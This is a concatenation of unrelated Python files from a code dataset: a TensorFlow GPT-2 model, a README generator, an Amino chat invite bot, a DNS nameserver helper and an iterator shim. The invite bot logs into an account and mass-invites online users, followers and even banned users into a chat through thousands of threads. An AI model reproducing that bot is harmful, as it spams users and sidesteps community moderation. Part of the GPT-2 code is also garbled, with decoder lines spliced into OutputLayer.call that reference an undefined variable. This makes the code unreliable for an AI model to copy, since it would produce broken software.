matmul_qk += (mask * -1e9)
# softmax is normalized on the last axis (seq_len_k) for scores to add up to 1
attention_weights = tf.nn.softmax(matmul_qk, axis=-1)
if training:
attention_weights = tf.nn.dropout(attention_weights, rate=self.att_dropout, name="attn_dropout") # (..., seq_len_q, seq_len_k)
output = tf.matmul(attention_weights, v)
return output, attention_weights
def split_heads(self, x):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)
"""
batch_size = tf.shape(x)[0]
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
def merge_heads(self, x):
batch_size = tf.shape(x)[0]
scaled_attention = tf.transpose(x, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)
merged = tf.reshape(scaled_attention,
(batch_size, -1, self.d_model))
return merged
def call(self, x, mask=None, past_layer=None, training=True):
x = self.c_attn(x)
query, key, value = tf.split(x, 3, axis=2)
query = self.split_heads(query) # (batch_size, seq_len, d_model)
key = self.split_heads(key) # (batch_size, seq_len, d_model)
value = self.split_heads(value) # (batch_size, seq_len, d_model)
if past_layer is not None:
past_key, past_value = tf.unstack(past_layer, axis=1)
key = tf.concat([past_key, key], axis=-2)
value = tf.concat([past_value, value], axis=2)
present = tf.stack([key, value], axis=1)
scaled_attention, attention_weights = self.multihead_attention(query, key, value, training, mask)
concat_attention = self.merge_heads(scaled_attention)
output = self.c_proj(concat_attention)
if training:
output = tf.nn.dropout(output, rate=self.residual_dropout, name="resit_dropout")
return output, present
class EmbeddingLayer(tf.keras.layers.Layer):
def __init__(self, vocab_size, embedding_size, initializer=None, stddev=0.01, mean=0.0):
super(EmbeddingLayer, self).__init__()
self.vocab_size = vocab_size
self.embedding_size = embedding_size
self.stddev = stddev
self.mean = mean
self.initializer = initializer
if self.initializer is None:
self.initializer = tf.random_normal_initializer(mean=self.mean, stddev=self.stddev)
def build(self, input_shape):
with tf.name_scope("embedding_weights"):
self.embedding_weights = self.add_weight("weights", shape=[self.vocab_size, self.embedding_size],
dtype="float32",
initializer=self.initializer
)
super(EmbeddingLayer, self).build(input_shape)
def call(self, inputs, mode="embedding", scale=False):
if mode == "embedding":
return self.embedding(inputs, scale=scale)
elif mode == "projection":
return self.projection(inputs)
else:
raise ValueError("mode {} is not valid.".format(mode))
def embedding(self, inputs, scale=False):
with tf.name_scope("embedding"):
# Create binary mask of size [batch_size, length]
mask = tf.cast(tf.not_equal(inputs, 0), tf.float32)
inputs = tf.cast(inputs, tf.int32)
embeddings = tf.nn.embedding_lookup(self.embedding_weights, inputs)
embeddings *= tf.expand_dims(mask, -1)
# Scale embedding by the sqrt of the hidden size
if scale:
embeddings *= self.embedding_size ** 0.5
return embeddings
def projection(self, inputs):
with tf.name_scope("output_layer"):
batch_size = tf.shape(inputs)[0]
seq_len = tf.shape(inputs)[1]
h_flat = tf.reshape(inputs, [-1, self.embedding_size])
logits = tf.matmul(h_flat, self.embedding_weights, transpose_b=True)
return tf.reshape(logits, [batch_size, seq_len, self.vocab_size])
class PositionEmbeddingLayer(tf.keras.layers.Layer):
def __init__(self, position_seq, pos_embedding_size, trainable=True, stddev=0.02, mean=0.0):
super(PositionEmbeddingLayer, self).__init__()
self.position_seq = position_seq
self.hidden_size = pos_embedding_size
self.trainable = trainable
self.stddev = stddev
self.mean = mean
if trainable:
self.position_embedding = EmbeddingLayer(self.position_seq, self.hidden_size,
stddev=self.stddev, mean=self.mean)
def call(self, inputs, start=1):
with tf.name_scope("pos_embedding"):
if self.trainable:
batch_size = tf.shape(inputs)[0]
batch_seq = tf.shape(inputs)[1]
positions = tf.reshape(tf.tile(tf.range(start, batch_seq + start), [batch_size]),
[batch_size, batch_seq])
positions = tf.cast(positions, tf.int32)
position_mask = tf.cast(tf.not_equal(inputs, 0), tf.int32)
positions *= position_mask
return self.position_embedding(positions)
else:
return self.get_position_sinusoid(self.position_seq)
@staticmethod
def get_position_sinusoid(seq_len, hidden_size, min_timescale=1.0, max_timescale=1.0e4):
position = tf.cast(tf.range(seq_len), tf.float32)
num_timescales = hidden_size // 2
log_timescale_increment = (
math.log(float(max_timescale) / float(min_timescale)) /
(tf.cast(num_timescales, tf.float32) - 1))
inv_timescales = min_timescale * tf.exp(
tf.cast(tf.range(num_timescales), tf.float32) * -log_timescale_increment)
scaled_time = tf.expand_dims(position, 1) * tf.expand_dims(inv_timescales, 0)
signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)
return signal
class Conv1d(tf.keras.layers.Layer):
def __init__(self,
hidden_size,
filter_size,
weights_init_stdev=0.02,
weights_mean=0.0,
bias_init=0.0):
super(Conv1d, self).__init__()
self.weights_init_stdev = weights_init_stdev
self.weights_mean = weights_mean
self.bias_init = bias_init
self.hidden_size = hidden_size
self.filter_size = filter_size
def build(self, input_shape):
self.weight = self.add_weight(
"cov1d_weights",
shape=[self.hidden_size, self.filter_size],
dtype=tf.float32,
initializer=tf.random_normal_initializer(
stddev=self.weights_init_stdev,
mean=self.weights_mean))
self.bias = self.add_weight("conv1d_biases",
shape=[self.filter_size],
initializer=tf.constant_initializer(self.bias_init))
super(Conv1d, self).build(input_shape)
def call(self, inputs):
output_shape = [tf.shape(inputs)[0], tf.shape(inputs)[1]] + [self.filter_size]
inputs = tf.reshape(inputs, [-1, self.hidden_size]) # shape [batch, seq , features] => [batch*seq, features]
outputs = tf.matmul(inputs, self.weight) + self.bias
outputs = tf.reshape(outputs, output_shape) # Reshape => [batch, seq, filter_size]
return outputs
class FeedForward(tf.keras.layers.Layer):
def __init__(self, hidden_size, filter_size, dropout_rate=0.45, activation=tf.nn.relu):
super(FeedForward, self).__init__()
self.hidden_size = hidden_size
self.filter_size = filter_size
self.activation = activation
self.dropout_rate = dropout_rate
self.dense_layer = Conv1d(self.hidden_size, self.filter_size)
self.output_dense_layer = Conv1d(self.filter_size, self.hidden_size)
def call(self, x, training=False):
output = self.dense_layer(x)
output = self.activation(output)
output = self.output_dense_layer(output)
if training:
output = tf.nn.dropout(output, rate=self.dropout_rate, name="feed_forward_dropout")
return output
class LayerNormalization(tf.keras.layers.Layer):
def __init__(self, hidden_size):
super(LayerNormalization, self).__init__()
self.hidden_size = hidden_size
def build(self, input_shape):
self.gamma = self.add_weight(
"layer_norm_scale",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.ones_initializer(),
experimental_autocast=False)
self.beta = self.add_weight(
"layer_norm_bias",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.zeros_initializer(),
experimental_autocast=False)
super(LayerNormalization, self).build(input_shape)
def call(self, x, epsilon=1e-6, input_dtype=tf.float32):
mean = tf.reduce_mean(x, axis=[-1], keepdims=True)
variance = tf.reduce_mean(tf.square(x - mean), axis=[-1], keepdims=True)
normalized = (x - mean) * tf.math.rsqrt(variance + epsilon)
return tf.cast(normalized * self.gamma + self.beta, input_dtype)
def argmax(logits):
return tf.argmax(logits)
def top_k_logits(logits, k):
if k == 0:
return logits
values, _ = tf.nn.top_k(logits, k=k)
min_values = values[:, -1]
return tf.where(
logits < min_values,
tf.ones_like(logits, dtype=logits.dtype) * -1e10,
logits
)
# Nucleas Sampling (https://arxiv.org/pdf/1904.09751.pdf)
def top_p_logits(logits, p):
"""Took from OpenAI GPT-2 Implememtation"""
batch = tf.shape(logits)[0]
sorted_logits = tf.sort(logits, direction='DESCENDING', axis=-1)
cumulative_probs = tf.cumsum(tf.nn.softmax(sorted_logits, axis=-1), axis=-1)
indices = tf.stack([
tf.range(0, batch),
tf.maximum(tf.reduce_sum(tf.cast(cumulative_probs <= p, tf.int32), axis=-1) - 1, 0),
], axis=-1)
min_values = tf.gather_nd(sorted_logits, indices)
return tf.where(
logits < min_values,
tf.ones_like(logits) * -1e10,
logits,
)
train_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Inputs"),
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Targets"),
tf.TensorSpec(shape=(None), dtype=tf.int32, name="Step")
]
test_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Inputs"),
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Targets"),
tf.TensorSpec(shape=(None), dtype=tf.int32, name="Step")
]
class Gpt2(tf.keras.Model):
def __init__(self, num_layers, d_model, num_heads, dff, max_seq_len, vocab_size, tokenizer,
optimizer="adam", learning_rate=0.005, rev_embedding_projection=True):
super(Gpt2, self).__init__()
self.rev_embedding_projection = rev_embedding_projection
self.num_layers = num_layers
self.num_heads = num_heads
self.dff = dff
self.max_seq_len = max_seq_len
self.vocab_size = vocab_size
self.d_model = d_model
self.tokenizer = tokenizer
self.learning_rate = learning_rate
self.optimizer_t = optimizer
self.dataset = None
self.mirrored_strategy = None
self.embedding = EmbeddingLayer(
self.vocab_size, self.d_model)
self.pos_embedding = PositionEmbeddingLayer(
self.max_seq_len, self.d_model)
self.decoder_layers = [DecoderLayer(self.d_model, self.num_heads, self.dff)
for _ in range(self.num_layers)]
self.layer_norm = LayerNormalization(self.d_model)
if not self.rev_embedding_projection:
self.output_layer = OutputLayer(self.vocab_size)
self.loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction='none')
self.accuracy_object = tf.keras.metrics.SparseCategoricalAccuracy(
name='accuracy')
self.train_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32)]
self.test_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32)]
def call(self, x, training=True, past=None):
x = tf.cast(x, tf.int32)
batch, sequence = tf.shape(x)[0], tf.shape(x)[1]
if past is None:
pasts = [None] * self.num_layers
else:
pasts = past
assert len(pasts) == self.num_layers
att_mask = create_masks(x)
past_length = 1 if past is None else tf.shape(past)[-2]
with tf.name_scope("embeddings"):
embedded_x = self.embedding(x)
hidden_states = embedded_x + self.pos_embedding(x, start=past_length)
presents = []
for decoder_layer, past in zip(self.decoder_layers, pasts):
hidden_states, present = decoder_layer(hidden_states, training, att_mask, past=past)
presents.append(present)
hidden_states = self.layer_norm(hidden_states)
if self.rev_embedding_projection:
logits = self.embedding(hidden_states, mode="projection")
else:
logits = self.output_layer(hidden_states)
return logits, presents
@staticmethod
def get_padded_accuracy(labels, logits):
with tf.name_scope("padded_accuracy"):
weights = tf.cast(tf.not_equal(labels, 0), tf.float32)
outputs = tf.cast(tf.argmax(logits, axis=-1), tf.int32)
padded_labels = tf.cast(labels, tf.int32)
nonpad_seq = tf.math.count_nonzero(weights, dtype=tf.dtypes.float32, )
acc = tf.cast(tf.equal(outputs, padded_labels), tf.float32)
accuracy = tf.reduce_sum(tf.cast(acc * weights, tf.float32)) / nonpad_seq
return tf.cast(accuracy, tf.float32)
def create_optimizer(self):
optimizer = self.optimizer_t.lower()
with tf.name_scope("optimizer"):
if optimizer == "adam":
self.optimizer = tf.keras.optimizers.Adam(self.learning_rate, beta_1=0.9, beta_2=0.98,
epsilon=1e-9)
elif optimizer == "adadelta":
self.optimizer = tf.keras.optimizers.Adadelta(self.learning_rate)
elif optimizer == "rms":
self.optimizer = tf.keras.optimizers.RMSprop(self.learning_rate)
else:
self.optimizer = tf.keras.optimizers.SGD(self.learning_rate)
return self.optimizer
def get_loss(self, real, pred):
with tf.name_scope("loss_layer"):
mask = tf.math.logical_not(tf.math.equal(real, 0))
loss_ = self.loss_object(real, pred)
with tf.name_scope("loss_masking"):
mask = tf.cast(mask, dtype=loss_.dtype)
loss_ *= mask
loss_ = tf.reduce_sum(loss_, axis=1)
sequence_avg_loss = loss_ / tf.reduce_sum(mask, axis=1)
return sequence_avg_loss
def create_checkpoint_manager(self, checkpoint_path, max_to_keep=5, load_model=True):
with tf.name_scope('checkpoint_manager'):
ckpt = tf.train.Checkpoint(optimizer=self.optimizer, model=self)
self.ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=max_to_keep)
if load_model: # If want to load trained weights
ckpt.restore(self.ckpt_manager.latest_checkpoint)
print('Latest checkpoint restored...............')
else:
print("Initializing model from scratch..........")
def load_model(self, filepath):
ckpt = tf.train.Checkpoint(model=self)
ckpt_manager = tf.train.CheckpointManager(ckpt, filepath, max_to_keep=5)
ckpt.restore(ckpt_manager.latest_checkpoint)
print("Model Restored..........................")
def create_summary_writer(self, summary_path):
train_summary_path = summary_path + "/train"
test_summary_path = summary_path + "/test"
with tf.name_scope('summary'):
self.train_writer = tf.summary.create_file_writer(train_summary_path)
self.test_writer = tf.summary.create_file_writer(test_summary_path)
return self.train_writer, self.test_writer
@tf.function(input_signature=train_step_signature)
def train_step(self, inputs, targets, step, grad_clip=True, clip_value=2.5):
with tf.GradientTape() as tape:
predictions, _ = self(inputs, training=True)
loss = tf.reduce_mean(self.get_loss(targets, predictions))
with tf.name_scope("gradients"):
gradients = tape.gradient(loss, self.trainable_variables)
if grad_clip:
gradients = [(tf.clip_by_value(grad, -clip_value, clip_value))
for grad in gradients]
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
accuracy = self.get_padded_accuracy(targets, predictions)
with tf.name_scope("summary_writer"):
with self.train_writer.as_default():
tf.summary.scalar("loss", loss, step=tf.cast(step, tf.int64))
tf.summary.scalar("accuracy", accuracy, step=tf.cast(step, tf.int64))
return loss, accuracy
@tf.function(input_signature=test_step_signature)
def test_step(self, inputs, targets, step, grad_clip=True, clip_value=2.5):
with tf.GradientTape() as tape:
predictions, _ = self(inputs, training=False)
test_loss = tf.reduce_mean(self.get_loss(targets, predictions))
test_accuracy = self.get_padded_accuracy(targets, predictions)
with tf.name_scope("summary_writer"):
with self.test_writer.as_default():
tf.summary.scalar("test_loss", test_loss, step=tf.cast(step, tf.int64))
tf.summary.scalar("test_accuracy", test_accuracy, step=tf.cast(step, tf.int64))
return test_loss, test_accuracy
def fit(self, train_dataset, test_dataset, EPOCHS=50):
for epoch in range(EPOCHS):
tf.summary.trace_on(graph=True, profiler=True)
print('EPOCH :{}'.format(epoch))
if not epoch == 0:
step = epoch * step
test_step = epoch * test_step
tf.summary.trace_on(graph=True, profiler=True)
for (step, (inputs, targets)) in enumerate(train_dataset):
train_loss, train_acc = self.train_step(inputs, targets, step)
if step % 100 == 0:
print('Step {} Train_Loss {:.4f} Train_Accuracy {:.4f}'.format(
step, train_loss, train_acc))
if step == 25:
with self.train_writer.as_default():
tf.summary.trace_export(
name="gpt-2",
step=step,
profiler_outdir='logs/train')
if step % 5000 == 0:
ckpt_save_path = self.ckpt_manager.save()
print('Saving checkpoint for step {} at {}'.format(step,
ckpt_save_path))
# tf.summary.trace_on(graph=True, profiler=True)
for (test_step, (inputs, targets)) in enumerate(test_dataset):
test_loss, test_acc = self.test_step(inputs, targets, test_step)
if not epoch == 0:
test_step = epoch * test_step
if test_step % 100 == 0:
print('Step {} Test_Loss {:.4f} Test_Accuracy {:.4f}'.format(
test_step, test_loss, test_acc))
if test_step == 25:
with self.test_writer.as_default():
tf.summary.trace_export(
name="gpt2_test",
step=test_step,
profiler_outdir='logs/test')
def beam_search(self, predictions, top_k=25):
#start with an empty sequence with zero score
output_sequences = [([], 0)]
#looping through all the predictions
for token_probs in predictions:
new_sequences = []
#append new tokens to old sequences and re-score
for old_seq, old_score in output_sequences:
for char_index in range(len(token_probs)):
new_seq = old_seq + [char_index]
#considering log-likelihood for scoring
new_score = old_score + math.log(token_probs[char_index])
new_sequences.append((new_seq, new_score))
#sort all new sequences in the de-creasing order of their score
output_sequences = sorted(new_sequences, key = lambda val: val[1], reverse = True)
#select top-k based on score
# *Note- best sequence is with the highest score
output_sequences = output_sequences[:top_k]
return output_sequences
def sample_sequence(self,seq_len, context=None,temperature=.96,
top_k=25,
top_p=.95,
nucleus_sampling=True):
# vocab_size=2**15
# model_gen = Gpt2(num_layers=self.num_layers, d_model=self.d_model, num_heads=self.num_heads, dff=self.dff, max_seq_len=self.max_seq_len, vocab_size=self.tokenizer.get_vocab_size(), tokenizer=self.tokenizer, optimizer="adam")
# model_gen.create_optimizer()
# model_gen.create_checkpoint_manager('checkpoint')
bos=self.tokenizer.bos_token_id#.encode('<START>')#.ids[0]
eos=self.tokenizer.eos_token_id#.ids[0]
if context == None:
print("Give some context to model.................")
return
context_str = context
context = tf.expand_dims(([bos] + self.tokenizer.encode(context)), 0)
# context = tf.expand_dims(([bos] + [self.tokenizer.encode(context)]), 0)
prev = context
print(prev)
output = context
past = None
for i in range(seq_len):
#context = tf.expand_dims((self.tokenicontext).ids), 0)
#prev = context
#output = context
past = None
logits, past = self(prev, training=False, past=past)
# print(logits)
#logits = (tf.nn.softmax(logits[-1, -5:, :].numpy(),axis=-1) / tf.cast(1.25, tf.float32)).numpy()
logits = logits[:,-1,:] / tf.cast(temperature, tf.float32)
#predictions = beam_search_decoder(logits, 5)
#np.random.shuffle(predictions)
#print([self.tokenizer.decode(i) for i in predictions])
#predictions = predictions[0][0]
# print(logits)
logits = top_k_logits(logits, k=top_k)
# print(logits)
if nucleus_sampling:
logits = top_p_logits(logits, p=top_p)
samples = tf.random.categorical(logits, num_samples=1, dtype=tf.int32)
if tf.equal(samples, eos):
print("Predicted end of sequence.")
break
# print("shape.........")
# print(tf.shape(output))
# print(tf.shape(samples))
#context_str = context_str + ' ' + self.tokenizer.decode(predictions)
#context = tf.expand_dims(([bos] + self.tokenizer.encode(context_str), 0))
prev = samples
output = tf.concat([output, samples], axis=-1)
# print(tf.shape(output))
# print(output)
# print("--------------------------")
result = tf.squeeze(output, axis=0)
pred = [int(i) for i in result]
generated_seq = self.tokenizer.decode([i for i in pred[1:]])
#generated_seq = generated_seq.replace("|SEP|", "\n")
generated_seq = ' '.join(generated_seq.split())
generated_seq = generated_seq.replace("<NEWLINE>", "\n").replace("<|>","\n").replace("<|NEWLINE|NEWLINE|>","\n").replace("<|NEWLINE|NEWLINE|NEWLINE|>","\n")
return generated_seq
from math import log
from numpy import array
from numpy import argmax
# beam search
def beam_search_decoder(data, k):
sequences = [[list(), 0.0]]
# walk over each step in sequence
for row in data:
all_candidates = list()
# expand each current candidate
for i in range(len(sequences)):
seq, score = sequences[i]
for j in range(len(row)):
candidate = [seq + [j], score - log(row[j])]
all_candidates.append(candidate)
# order all candidates by score
ordered = sorted(all_candidates, key=lambda tup:tup[1])
# select k best
sequences = ordered[:k]
return sequences
class OutputLayer(tf.keras.layers.Layer):
def __init__(self, output_dim, proj_weights=None, kernel_initializer=None):
super(OutputLayer, self).__init__()
self.proj_weights = proj_weights
self.output_dim = output_dim
self.layer_weights = None
self.kernel_initializer = kernel_initializer
def build(self, input_shape):
if self.proj_weights is None:
input_dim = tensor_shape.dimension_value(input_shape[-1])
self.layer_weights = self.add_weight(
'output_layer_weights',
shape=[input_dim, self.output_dim],
initializer=self.kernel_initializer,
trainable=True)
super(OutputLayer, self).build(input_shape)
def call(self, x):
batch, sequence, d_model = tf.shape(x)[0], tf.shape(x)[1], tf.shape(x)[-1]
with tf.name_scope("residual_conn"):
x = x + out
out = self.feed_forward(self.layer_norm2(x), training=training) # (batch_size, input_seq_len, d_model)
with tf.name_scope("residual_conn"):
x = x + out
return x, present
class DecoderLayer(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, dff,
dr_rate=0.45):
super(DecoderLayer, self).__init__()
self.d_model = d_model
self.num_heads = num_heads
self.dff = dff
self.dr_rate = dr_rate
self.mha = MultiHeadAttention(self.d_model, self.num_heads)
self.feed_forward = FeedForward(self.d_model, self.dff, self.dr_rate)
self.layer_norm1 = LayerNormalization(self.d_model)
self.layer_norm2 = LayerNormalization(self.d_model)
def call(self, x, training, mask, past=None):
out, present = self.mha(self.layer_norm1(x), mask=mask, past_layer=past,
training=training) # (batch_size, input_seq_len, d_model)
with tf.name_scope("residual_conn"):
x = x + out
out = self.feed_forward(self.layer_norm2(x), training=training) # (batch_size, input_seq_len, d_model)
with tf.name_scope("residual_conn"):
x = x + out
return x, present
def run():
sequence_size = 12
trainTensor, testTensor, tokenizer = simple_method(sequence_size)
model = Gpt2(6, 512, 8, 512, sequence_size, vocab_size=tokenizer.vocab_size+3, tokenizer=tokenizer, optimizer='adam')
opt = model.create_optimizer()
model.create_checkpoint_manager('checkpoint')
model.create_summary_writer('logs')
model.compile(loss=model.loss_object, optimizer=opt)
model.fit(trainTensor, testTensor)
# model.save('aesop')
| StarcoderdataPython |
1777759 | <filename>docs/generate-readme.py
# Run this as a pre-commit script.
# Will be a no-op unless docs have changed.
#
# Takes readme-generator.md and creates:
# 1. A jekyll-ready markdown file with includes for dynamic github pages
# 2. A github-ready markdown file with images for static pages
import os
import sys
def initialize_dynamic_lines():
return [
'---\n',
'layout: default\n',
'---\n'
]
def initialize_static_lines():
return [
'# A lightweight range slider with expandable timeline\n\n',
'See this project at [artoonie.github.io/timeline-range-slider](https://artoonie.github.io/timeline-range-slider)\n\n',
'The project page has dynamic sliders you can interact with.\n\n',
'\n',
'[](https://coveralls.io/github/artoonie/timeline-range-slider?branch=main)\n',
'\n',
'\n'
'\n'
]
def isFileDataEqual(filename, expectedlines):
# Is expectedlines equal to filename?
with open(filename, 'r') as f:
lines = f.readlines()
return lines == expectedlines
def create_derived_files(input_filename, output_static_filename, output_dynamic_filename):
# Map from a magic key to a triple:
# 1. variable name (just a helper - must match the key)
# 2. What file to include in the dynamic file?
# 3. What file to include in the static file?
magic_keys = {
'{{ deps }}\n': ('deps', 'docs/deps.html', None),
'{{ ex0 }}\n': ('ex0', 'docs/example-0-teaser.html', 'docs/images/ex0.png'),
'{{ ex1 }}\n': ('ex1', 'docs/example-1-default.html', 'docs/images/ex0.png'),
'{{ ex2 }}\n': ('ex2', 'docs/example-2-darkmode.html', 'docs/images/ex2.png'),
'{{ ex3 }}\n': ('ex3', 'docs/example-3-small.html', 'docs/images/ex3.png'),
'{{ ex4 }}\n': ('ex4', 'docs/example-4-custom-tick-text.html', 'docs/images/ex4.png')
}
# Small enough to just read it all into memory,
# why complicate things?
with open(input_filename, 'r') as f:
lines = f.readlines()
static_lines = initialize_static_lines()
dynamic_lines = initialize_dynamic_lines()
for line in lines:
if line not in magic_keys:
static_lines.append(line)
dynamic_lines.append(line)
continue
# Magic keyword found. Do magic for static or dynamic
(key, dynamic_content, static_content) = magic_keys[line]
if static_content is not None:
# Replace the static content
static_lines.append(f'\n[\[interactive demo\]](https://artoonie.github.io/timeline-range-slider)\n')
static_lines.append(f'\n')
# Include the actual content + the dynamic content
include_line = '{% capture ' + key + ' %}'
include_line += '{% include_relative ' + dynamic_content + ' %}'
include_line += '{% endcapture %}\n'
dynamic_lines.append(include_line)
dynamic_lines.append(line)
# Safety check: don't overwrite accidental changes
stream = os.popen('git diff --name-only')
diffs = stream.read()
# Make sure we didn't accidentally change README.md or index.md
if output_dynamic_filename in diffs:
if not isFileDataEqual(output_dynamic_filename, dynamic_lines):
print(f"File {output_dynamic_filename} is dirty. Refusing to overwrite.")
sys.exit(-1)
if output_static_filename in diffs:
if not isFileDataEqual(output_static_filename, static_lines):
print(f"File {output_static_filename} is dirty. Refusing to overwrite.")
sys.exit(-1)
# Finally, write it all
with open(output_static_filename, 'w') as f:
f.write(''.join(static_lines))
with open(output_dynamic_filename, 'w') as f:
f.write(''.join(dynamic_lines))
create_derived_files('docs/readme-generator.md', 'README.md', 'index.md')
| StarcoderdataPython |
126247 | <reponame>HOTNSPICY12/InviteFuckKwel
import amino, concurrent.futures
import os
print("\t\033[1;31m GCINVITEBOT\n\n")
print("\t\033[1;32m Script by \033[1;36mMr.COMRADE \n\n")
print("\t\033[1;32m Again fixed by: \033[1;36mPRINCE OF PERSIA \n\n")
client = amino.Client()
email = input("Email: ")
password = input("Password: ")
client.login(email=email, password=password)
clients = client.sub_clients(size=100)
for x, name in enumerate(clients.name, 1):
print(f"{x}.{name}")
communityid = clients.comId[int(input("Select the community: "))-1]
sub_client = amino.SubClient(comId=communityid, profile=client.profile)
chats = sub_client.get_chat_threads(size=100)
for z, title in enumerate(chats.title, 1):
print(f"{z}.{title}")
chatx = chats.chatId[int(input("Select the chat: "))-1]
#invite functions(def) thanks to https://github.com/LynxN1 for example
def inviteonlineusers():
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
onlineusers = sub_client.get_online_users(start=i, size=5000).profile.userId
if onlineusers:
for userId in onlineusers:
print(f"{userId} Invited/")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
else:
break
for i in range(0, 20000, 250):
publichats = sub_client.get_public_chat_threads(type="recommended", start=i, size=5000).chatId
chatsuin = sub_client.get_chat_threads(start=i, size=100).chatId
chats = [*publichats, *chatsuin]
if chats:
for chatid in chats:
for u in range(0, 1000, 50):
users = sub_client.get_chat_users(chatId=chatid, start=u, size=100).userId
if users:
for userId in users:
try:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
except:
pass
else:
break
print("Invited All Online Users")
def inviteuserfollowers():
userlink=input("Type user link: ")
user=client.get_from_code(userlink)
userx=user.objectId
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
followers = sub_client.get_user_followers(userId=userx, start=i, size=100).profile.userId
if followers:
for userId in followers:
try:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
except:
pass
else:
break
print("Invited User Followers/....")
def inviterecentbannedusers():
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
recentusers = sub_client.get_all_users(type="recent", start=i, size=100).profile.userId
bannedusers = sub_client.get_all_users(type="banned", start=i, size=100).profile.userId
users = [*recentusers, *bannedusers]
if users:
for userId in users:
print(f"{names} Invited/.....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
else:
break
print("Invited Recent & Banned Users")
def inviteallusers():
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
onlineusers = sub_client.get_online_users(start=i, size=100).profile.userId
recentusers = sub_client.get_all_users(type="recent", start=i, size=100).profile.userId
bannedusers = sub_client.get_all_users(type="banned", start=i, size=100).profile.userId
users = [*onlineusers, *recentusers, *bannedusers]
if users:
for userId in users:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
else:
break
for i in range(0, 20000, 250):
publichats = sub_client.get_public_chat_threads(type="recommended", start=i, size=100).chatId
chatsuin = sub_client.get_chat_threads(start=i, size=100).chatId
chats = [*publichats, *chatsuin]
if chats:
for chatid in chats:
for u in range(0, 1000, 50):
users = sub_client.get_chat_users(chatId=chatid, start=u, size=100).userId
if users:
for userId in users:
try:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
except:
pass
else:
break
print("Invited All Online Users:")
#invite functions(def) thanks to https://github.com/LynxN1 for example
print("1.Invite Online Users:")
print("2.Invite User Followers:")
print("3.Invite Recent & Banned Users:")
print("4.Invite All Users:")
inviteselect = input("Type Number: ")
if inviteselect == "1":
inviteonlineusers()
elif inviteselect == "2":
inviteuserfollowers()
elif inviteselect == "3":
inviterecentbannedusers()
elif inviteselect == "4":
inviteallusers()
| StarcoderdataPython |
82333 | import sys
import time
import random
from .address import Address
__all__ = [
'NameServers',
'NoNameServer',
]
class NoNameServer(Exception):
pass
class IterMixIn:
def iter(self):
if not self.data: raise NoNameServer
return iter(self.data)
def success(self, item):
pass
def fail(self, item):
pass
class WeightMixIn:
def __init__(self, *k, **kw):
self._failures = [0] * len(self.data)
self.ts = 0
self._update()
def _update(self):
if time.time() > self.ts + 60:
self.ts = time.time()
self._sorted = list(self.data[i] for i in sorted(range(len(self.data)), key=lambda i: self._failures[i]))
self._last_min_failures = self._failures
self._failures = [0] * len(self.data)
def success(self, item):
self._update()
def fail(self, item):
self._update()
index = self.data.index(item)
self._failures[index] += 1
def iter(self):
if not self.data: raise NoNameServer
return iter(self._sorted)
class NameServers(WeightMixIn, IterMixIn):
def __init__(self, nameservers=[], **kw):
self.data = [Address.parse(item, default_protocol='udp', allow_domain=True) for item in nameservers]
super().__init__(**kw)
def __bool__(self):
return len(self.data) > 0
def __iter__(self):
return iter(self.data)
def __repr__(self):
return '<NameServers [%s]>' % ','.join(map(str, self.data))
| StarcoderdataPython |
2238 | class SeqIter:
def __init__(self,l):
self.l = l
self.i = 0
self.stop = False
def __len__(self):
return len(self.l)
def __list__(self):
l = []
while True:
try:
l.append(self.__next__())
except StopIteration:
break
return l
def __iter__(self):
return self
def __next__(self):
has_length = True
found = False
try:
self.l.__len__()
except AttributeError:
has_length = False
try:
if self.stop:
raise StopIteration()
if has_length and self.i >= self.l.__len__():
self.stop = True
raise StopIteration()
ret = self.l[self.i]
found = True
except IndexError:
raise StopIteration()
except StopIteration:
raise StopIteration()
self.i += 1
if found:
return ret
else:
return None
___assign("%SeqIter", SeqIter)
def iter(l, *args):
callable = ___id("%callable")
if args.__len__() == 1:
if callable(l):
stopwhen = args[0]
return FuncIter(l, stopwhen)
else:
TypeError("iter(v, w): v must be callable")
elif args.__len__() == 0:
try:
return l.__iter__()
except:
try:
if callable(l.__getitem__):
return SeqIter(l)
except:
raise TypeError("object is not iterable")
else:
raise TypeError("iter expect at most 2 arguments")
___assign("%iter", iter)
def next(it, *arg):
if len(arg) == 0:
return it.__next__()
else:
return it.__next__(arg[0])
___assign("%next", next)
class FuncIter:
def __init__(self, func, stopwhen):
self.func = func
self.stopwhen = stopwhen
self.stopped = False
def __list__(self):
l = []
while not self.stopped:
try:
l.append(self.__next__())
except StopIteration:
break
return l
def __next__(self):
f = self.func
v = f()
if v == self.stopwhen:
self.stopped = True
raise StopIteration()
else:
return v
___assign("%FuncIter", FuncIter)
| StarcoderdataPython |
1627295 | import argparse
import atexit
import boto3
